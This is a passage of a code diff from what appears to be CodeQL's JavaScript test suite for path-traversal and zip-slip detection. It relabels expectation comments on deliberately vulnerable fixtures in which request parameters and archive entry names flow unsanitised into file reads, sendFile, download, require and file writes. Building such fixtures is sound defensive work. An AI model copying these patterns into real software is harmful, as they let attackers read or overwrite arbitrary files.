getFsModule(true).readFileSync(path); // NOT OK - getFsModule(false).readFileSync(path); // NOT OK + getFsModule(true).readFileSync(path); // $ Alert + getFsModule(false).readFileSync(path); // $ Alert - require("./my-fs-module").require(true).readFileSync(path); // NOT OK + require("./my-fs-module").require(true).readFileSync(path); // $ Alert let flexibleModuleName = require(process.versions["electron"] ? "original-fs" : "fs"); - flexibleModuleName.readFileSync(path); // NOT OK + flexibleModuleName.readFileSync(path); // $ Alert }); function getFsModule(special) { @@ -35,50 +35,50 @@ function getFsModule(special) { var util = require("util"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - util.promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisifyAll(fs).readFileSync(path); // NOT OK + util.promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisifyAll(fs).readFileSync(path); // $ Alert }); const asyncFS = require("./my-async-fs-module"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK - asyncFS.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + asyncFS.readFileSync(path); // $ Alert - require("pify")(fs.readFileSync)(path); // NOT OK - require("pify")(fs).readFileSync(path); // NOT OK + require("pify")(fs.readFileSync)(path); // $ Alert + require("pify")(fs).readFileSync(path); // $ Alert - require('util.promisify')(fs.readFileSync)(path); // NOT OK + require('util.promisify')(fs.readFileSync)(path); // $ Alert - require("thenify")(fs.readFileSync)(path); // NOT OK + require("thenify")(fs.readFileSync)(path); // $ Alert const readPkg = require('read-pkg'); - var pkg = readPkg.readPackageSync({cwd: path}); // NOT OK - var pkgPromise = readPkg.readPackageAsync({cwd: path}); // NOT OK + var pkg = readPkg.readPackageSync({cwd: path}); // $ Alert + var pkgPromise = readPkg.readPackageAsync({cwd: path}); // $ Alert }); const mkdirp = require("mkdirp"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK - mkdirp(path); // NOT OK - mkdirp.sync(path); // NOT OK + fs.readFileSync(path); // $ Alert + mkdirp(path); // $ Alert + mkdirp.sync(path); // $ Alert func(path); }); function func(x) { - fs.readFileSync(x); // NOT OK + fs.readFileSync(x); // $ Alert } const fsp = require("fs/promises"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - fsp.readFile(path); // NOT OK + fsp.readFile(path); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js index 7546bb2c2938..c198082b9932 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js @@ -3,12 +3,12 @@ const prettier = require("prettier"); const app = express(); app.get('/some/path', function (req, res) { - const { p } = req.params; - prettier.resolveConfig(p).then((options) => { // NOT OK + const { p } = req.params; // $ Source + prettier.resolveConfig(p).then((options) => { // $ Alert const formatted = prettier.format("foo", options); }); - prettier.resolveConfig("foo", {config: p}).then((options) => { // NOT OK + prettier.resolveConfig("foo", {config: p}).then((options) => { // $ Alert const formatted = prettier.format("bar", options); }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js index 363b2f014c7a..8b0a64f523c9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js @@ -2,15 +2,15 @@ const puppeteer = require('puppeteer'); const parseTorrent = require('parse-torrent'); (async () => { - let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; + let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; // $ Source const browser = await puppeteer.launch(); const page = await browser.newPage(); - await page.pdf({ path: tainted, format: 'a4' }); + await page.pdf({ path: tainted, format: 'a4' }); // $ Alert const pages = await browser.pages(); for (let i = 0; i < something(); i++) { - pages[i].screenshot({ path: tainted }); + pages[i].screenshot({ path: tainted }); // $ Alert } await browser.close(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js index eebc95348ba6..23c89ab5baec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js @@ -10,7 +10,7 @@ function getTree(req, res, options) { var workspaceId = req.params.workspaceId; var realfileRootPath = workspaceId; // getfileRoot(workspaceId); var filePath = workspaceId; // path.join(options.workspaceDir,realfileRootPath, req.params["0"]); - withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); + withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); // $ Source } function getfileRoot(workspaceId) { @@ -19,7 +19,7 @@ function getfileRoot(workspaceId) { } function withStatsAndETag(filepath, callback) { - fs.readFileSync(filepath); // NOT OK + fs.readFileSync(filepath); // $ Alert }; function decodeUserIdFromWorkspaceId(workspaceId) { diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js index 465b5b70b690..ab5d3f008507 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js @@ -3,32 +3,32 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var obj = bla ? something() : path; - fs.readFileSync(obj.sub); // NOT OK + fs.readFileSync(obj.sub); // $ Alert obj.sub = "safe"; - fs.readFileSync(obj.sub); // OK + fs.readFileSync(obj.sub); obj.sub2 = "safe"; if (random()) { - fs.readFileSync(obj.sub2); // OK + fs.readFileSync(obj.sub2); } if (random()) { obj.sub3 = "safe" } - fs.readFileSync(obj.sub3); // NOT OK + fs.readFileSync(obj.sub3); // $ Alert obj.sub4 = - fs.readFileSync(obj.sub4) ? // NOT OK - fs.readFileSync(obj.sub4) : // NOT OK - fs.readFileSync(obj.sub4); // NOT OK + fs.readFileSync(obj.sub4) ? // $ Alert + fs.readFileSync(obj.sub4) : // $ Alert + fs.readFileSync(obj.sub4); // $ Alert }); server.listen(); @@ -36,8 +36,8 @@ server.listen(); var nodefs = require('node:fs'); var server2 = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; - nodefs.readFileSync(path); // NOT OK + let path = url.parse(req.url, true).query.path; // $ Source + nodefs.readFileSync(path); // $ Alert }); server2.listen(); @@ -45,6 +45,6 @@ server2.listen(); const chownr = require("chownr"); var server3 = http.createServer(function (req, res) { - let path = url.parse(req.url, true).query.path; - chownr(path, "someuid", "somegid", function (err) {}); // NOT OK + let path = url.parse(req.url, true).query.path; // $ Source + chownr(path, "someuid", "somegid", function (err) {}); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js index 061dec18a908..b37ebc2926ad 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js @@ -7,11 +7,11 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - res.write(fs.readFileSync(['public', path].join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(['public', path].join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps let parts = ['public', path]; parts = parts.map(x => x.toLowerCase()); - res.write(fs.readFileSync(parts.join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(parts.join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js index 49c5fa78fe8d..a21ae5a6f915 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js @@ -3,13 +3,13 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source doRead(Promise.resolve(path)); }); async function doRead(pathPromise) { - fs.readFileSync(await pathPromise); // NOT OK - pathPromise.then(path => fs.readFileSync(path)); // NO TOK + fs.readFileSync(await pathPromise); // $ Alert + pathPromise.then(path => fs.readFileSync(path)); // $ Alert } server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js index 23f89c55c39f..d9c07feb26b6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js @@ -3,15 +3,14 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // BAD: loading a module based on un-sanitized query parameters - var m = require(req.param("module")); + var m = require(req.param("module")); // $ Alert - loading a module based on un-sanitized query parameters }); const resolve = require("resolve"); app.get('/some/path', function(req, res) { - var module = resolve.sync(req.param("module")); // NOT OK - resolving module based on query parameters + var module = resolve.sync(req.param("module")); // $ Alert - resolving module based on query parameters - resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // NOT OK - resolving module based on query parameters + resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // $ Alert - resolving module based on query parameters var module = res; }); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js index f4f289895a86..1c58a6943fa2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js @@ -4,39 +4,33 @@ let path = require('path'); var app = express(); app.get('/some/path/:x', function(req, res) { - // BAD: sending a file based on un-sanitized query parameters - res.sendFile(req.param("gimme")); - // BAD: same as above - res.sendfile(req.param("gimme")); + res.sendFile(req.param("gimme")); // $ Alert - sending a file based on un-sanitized query parameters + res.sendfile(req.param("gimme")); // $ Alert - same as above - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendFile(req.param("gimme"), { root: process.cwd() }); - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendfile(req.param("gimme"), { root: process.cwd() }); - // BAD: doesn't help if user controls root - res.sendFile(req.param("file"), { root: req.param("dir") }); + res.sendFile(req.param("file"), { root: req.param("dir") }); // $ Alert - doesn't help if user controls root let homeDir = path.resolve('.'); - res.sendFile(homeDir + '/data/' + req.params.x); // OK: sendFile disallows ../ - res.sendfile('data/' + req.params.x); // OK: sendfile disallows ../ + res.sendFile(homeDir + '/data/' + req.params.x); // OK - sendFile disallows ../ + res.sendfile('data/' + req.params.x); // OK - sendfile disallows ../ - res.sendFile(path.resolve('data', req.params.x)); // NOT OK - res.sendfile(path.join('data', req.params.x)); // NOT OK + res.sendFile(path.resolve('data', req.params.x)); // $ Alert + res.sendfile(path.join('data', req.params.x)); // $ Alert res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/' - // BAD: downloading a file based on un-sanitized query parameters - res.download(req.param("gimme")); + res.download(req.param("gimme")); // $ Alert - // BAD: download allows ../ - res.download(homeDir + '/data/' + req.params.x); + res.download(homeDir + '/data/' + req.params.x); // $ Alert - res.download(path.join('data', req.params.x)); // NOT OK + res.download(path.join('data', req.params.x)); // $ Alert - // BAD: doesn't help if user controls root - res.download(req.param("file"), { root: req.param("dir") }); + res.download(req.param("file"), { root: req.param("dir") }); // $ Alert - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.download(req.param("gimme"), { root: process.cwd() }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js index 1b1e87b9a76a..6f281013a63c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js @@ -3,29 +3,29 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; - fs.readFileSync(path.substring(i, j)); // OK - fs.readFileSync(path.substring(4)); // NOT OK - fs.readFileSync(path.substring(0, i)); // NOT OK - fs.readFileSync(path.substr(4)); // NOT OK - fs.readFileSync(path.slice(4)); // NOT OK + let path = url.parse(req.url, true).query.path; // $ Source + fs.readFileSync(path.substring(i, j)); + fs.readFileSync(path.substring(4)); // $ Alert + fs.readFileSync(path.substring(0, i)); // $ Alert + fs.readFileSync(path.substr(4)); // $ Alert + fs.readFileSync(path.slice(4)); // $ Alert - fs.readFileSync(path.concat(unknown)); // NOT OK - fs.readFileSync(unknown.concat(path)); // NOT OK - fs.readFileSync(unknown.concat(unknown, path)); // NOT OK + fs.readFileSync(path.concat(unknown)); // $ Alert + fs.readFileSync(unknown.concat(path)); // $ Alert + fs.readFileSync(unknown.concat(unknown, path)); // $ Alert - fs.readFileSync(path.trim()); // NOT OK - fs.readFileSync(path.toLowerCase()); // NOT OK + fs.readFileSync(path.trim()); // $ Alert + fs.readFileSync(path.toLowerCase()); // $ Alert - fs.readFileSync(path.split('/')); // OK (readFile throws an exception when the filename is an array) - fs.readFileSync(path.split('/')[0]); // OK -- for now - fs.readFileSync(path.split('/')[i]); // NOT OK - fs.readFileSync(path.split(/\//)[i]); // NOT OK - fs.readFileSync(path.split("?")[0]); // NOT OK - fs.readFileSync(path.split(unknown)[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown).whatever); // OK -- but still flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown)); // NOT OK - fs.readFileSync(path.split("?")[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] + fs.readFileSync(path.split('/')); // OK - readFile throws an exception when the filename is an array + fs.readFileSync(path.split('/')[0]); // OK - for now + fs.readFileSync(path.split('/')[i]); // $ Alert + fs.readFileSync(path.split(/\//)[i]); // $ Alert + fs.readFileSync(path.split("?")[0]); // $ Alert + fs.readFileSync(path.split(unknown)[i]); // $ MISSING: Alert + fs.readFileSync(path.split(unknown).whatever); // $ SPURIOUS: Alert + fs.readFileSync(path.split(unknown)); // $ Alert + fs.readFileSync(path.split("?")[i]); // $ MISSING: Alert }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js index 1e95cf84ec76..d3c74ed8493d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js @@ -2,7 +2,7 @@ const parseTorrent = require('parse-torrent'), fs = require('fs'); function getTorrentData(dir, torrent){ - let name = parseTorrent(torrent).name, + let name = parseTorrent(torrent).name, // $ Source loc = dir + "/" + name + ".torrent.data"; - return fs.readFileSync(loc); // NOT OK + return fs.readFileSync(loc); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts index f5fd62b2ee00..a0d2a78b5d7b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts @@ -6,29 +6,28 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list let path2 = path; - path2 ||= res.write(fs.readFileSync(path2)); // GOOD: path is falsy + path2 ||= res.write(fs.readFileSync(path2)); // OK - path is falsy let path3 = path; - path3 &&= res.write(fs.readFileSync(path3)); // BAD: path is truthy + path3 &&= res.write(fs.readFileSync(path3)); // $ Alert - path is truthy let path4 = path; - path4 ??= res.write(fs.readFileSync(path4)); // GOOD - path is null or undefined - but we don't capture that. [INCONSISTENCY] + path4 ??= res.write(fs.readFileSync(path4)); // $ SPURIOUS: Alert - path is null or undefined - but we don't capture that. let path5 = path; path5 &&= "clean"; - res.write(fs.readFileSync(path5)); // GOOD: path is either falsy or "clean"; + res.write(fs.readFileSync(path5)); // OK - path is either falsy or "clean"; let path6 = path; path6 ||= "clean"; - res.write(fs.readFileSync(path6)); // BAD: path can still be tainted + res.write(fs.readFileSync(path6)); // $ Alert - path can still be tainted }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/views.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/views.js index 37ba5b7ab0e3..111ecd10c5a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/views.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/views.js @@ -1 +1 @@ -module.exports = (req, res) => res.render(req.params[0]); +module.exports = (req, res) => res.render(req.params[0]); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/AdmZipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/AdmZipBad.js index 1de89842eb0d..8f587f6e143c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/AdmZipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/AdmZipBad.js @@ -3,5 +3,5 @@ var AdmZip = require('adm-zip'); var zip = new AdmZip("archive.zip"); var zipEntries = zip.getEntries(); zipEntries.forEach(function(zipEntry) { - fs.createWriteStream(zipEntry.entryName); + fs.createWriteStream(zipEntry.entryName); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/TarSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/TarSlipBad.js index 5398586e1251..543d43ffa310 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/TarSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/TarSlipBad.js @@ -3,10 +3,10 @@ const tar = require('tar-stream'); const extract = tar.extract(); extract.on('entry', (header, stream, next) => { - const out = fs.createWriteStream(header.name); + const out = fs.createWriteStream(header.name); // $ Alert if (header.linkname) { - fs.linkSync(header.linkname, "foo"); + fs.linkSync(header.linkname, "foo"); // $ Alert } stream.pipe(out); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.expected b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.expected index 67e38f937ba0..f8916181de12 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.expected @@ -1,3 +1,28 @@ +#select +| AdmZipBad.js:6:24:6:41 | zipEntry.entryName | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | Unsanitized archive entry, which may contain '..', is used in a $@. | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | file system operation | +| TarSlipBad.js:6:36:6:46 | header.name | TarSlipBad.js:6:36:6:46 | header.name | TarSlipBad.js:6:36:6:46 | header.name | Unsanitized archive entry, which may contain '..', is used in a $@. | TarSlipBad.js:6:36:6:46 | header.name | file system operation | +| TarSlipBad.js:9:17:9:31 | header.linkname | TarSlipBad.js:9:17:9:31 | header.linkname | TarSlipBad.js:9:17:9:31 | header.linkname | Unsanitized archive entry, which may contain '..', is used in a $@. | TarSlipBad.js:9:17:9:31 | header.linkname | file system operation | +| ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:6:22:6:29 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad2.js:6:22:6:29 | fileName | file system operation | +| ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:8:37:8:44 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:8:37:8:44 | fileName | file system operation | +| ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:16:30:16:37 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:16:30:16:37 | fileName | file system operation | +| ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:23:28:23:35 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:23:28:23:35 | fileName | file system operation | +| ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:31:26:31:29 | name | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:31:26:31:29 | name | file system operation | +| ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:35:26:35:29 | name | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:35:26:35:29 | name | file system operation | +| ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | file system operation | +edges +| ZipSlipBad2.js:5:9:5:46 | fileName | ZipSlipBad2.js:6:22:6:29 | fileName | provenance | | +| ZipSlipBad2.js:5:20:5:46 | 'output ... ry.path | ZipSlipBad2.js:5:9:5:46 | fileName | provenance | | +| ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:5:20:5:46 | 'output ... ry.path | provenance | Config | +| ZipSlipBad.js:7:11:7:31 | fileName | ZipSlipBad.js:8:37:8:44 | fileName | provenance | | +| ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:7:11:7:31 | fileName | provenance | | +| ZipSlipBad.js:15:11:15:31 | fileName | ZipSlipBad.js:16:30:16:37 | fileName | provenance | | +| ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:15:11:15:31 | fileName | provenance | | +| ZipSlipBad.js:22:11:22:31 | fileName | ZipSlipBad.js:23:28:23:35 | fileName | provenance | | +| ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:22:11:22:31 | fileName | provenance | | +| ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:31:26:31:29 | name | provenance | | +| ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:35:26:35:29 | name | provenance | | +| ZipSlipBadUnzipper.js:7:9:7:29 | fileName | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | provenance | | +| ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:7:9:7:29 | fileName | provenance | | nodes | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | semmle.label | zipEntry.entryName | | TarSlipBad.js:6:36:6:46 | header.name | semmle.label | header.name | @@ -22,29 +47,4 @@ nodes | ZipSlipBadUnzipper.js:7:9:7:29 | fileName | semmle.label | fileName | | ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | semmle.label | entry.path | | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | semmle.label | fileName | -edges -| ZipSlipBad2.js:5:9:5:46 | fileName | ZipSlipBad2.js:6:22:6:29 | fileName | provenance | | -| ZipSlipBad2.js:5:20:5:46 | 'output ... ry.path | ZipSlipBad2.js:5:9:5:46 | fileName | provenance | | -| ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:5:20:5:46 | 'output ... ry.path | provenance | Config | -| ZipSlipBad.js:7:11:7:31 | fileName | ZipSlipBad.js:8:37:8:44 | fileName | provenance | | -| ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:7:11:7:31 | fileName | provenance | | -| ZipSlipBad.js:15:11:15:31 | fileName | ZipSlipBad.js:16:30:16:37 | fileName | provenance | | -| ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:15:11:15:31 | fileName | provenance | | -| ZipSlipBad.js:22:11:22:31 | fileName | ZipSlipBad.js:23:28:23:35 | fileName | provenance | | -| ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:22:11:22:31 | fileName | provenance | | -| ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:31:26:31:29 | name | provenance | | -| ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:35:26:35:29 | name | provenance | | -| ZipSlipBadUnzipper.js:7:9:7:29 | fileName | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | provenance | | -| ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:7:9:7:29 | fileName | provenance | | subpaths -#select -| AdmZipBad.js:6:24:6:41 | zipEntry.entryName | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | Unsanitized archive entry, which may contain '..', is used in a $@. | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | file system operation | -| TarSlipBad.js:6:36:6:46 | header.name | TarSlipBad.js:6:36:6:46 | header.name | TarSlipBad.js:6:36:6:46 | header.name | Unsanitized archive entry, which may contain '..', is used in a $@. | TarSlipBad.js:6:36:6:46 | header.name | file system operation | -| TarSlipBad.js:9:17:9:31 | header.linkname | TarSlipBad.js:9:17:9:31 | header.linkname | TarSlipBad.js:9:17:9:31 | header.linkname | Unsanitized archive entry, which may contain '..', is used in a $@. | TarSlipBad.js:9:17:9:31 | header.linkname | file system operation | -| ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:6:22:6:29 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad2.js:6:22:6:29 | fileName | file system operation | -| ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:8:37:8:44 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:8:37:8:44 | fileName | file system operation | -| ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:16:30:16:37 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:16:30:16:37 | fileName | file system operation | -| ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:23:28:23:35 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:23:28:23:35 | fileName | file system operation | -| ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:31:26:31:29 | name | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:31:26:31:29 | name | file system operation | -| ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:35:26:35:29 | name | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:35:26:35:29 | name | file system operation | -| ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | file system operation | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.qlref b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.qlref index 0ac6382f48ab..921be7872bbf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.qlref @@ -1 +1,2 @@ -Security/CWE-022/ZipSlip.ql +query: Security/CWE-022/ZipSlip.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js index 0146533c6dca..e7ad3b8e264d 100644 --- 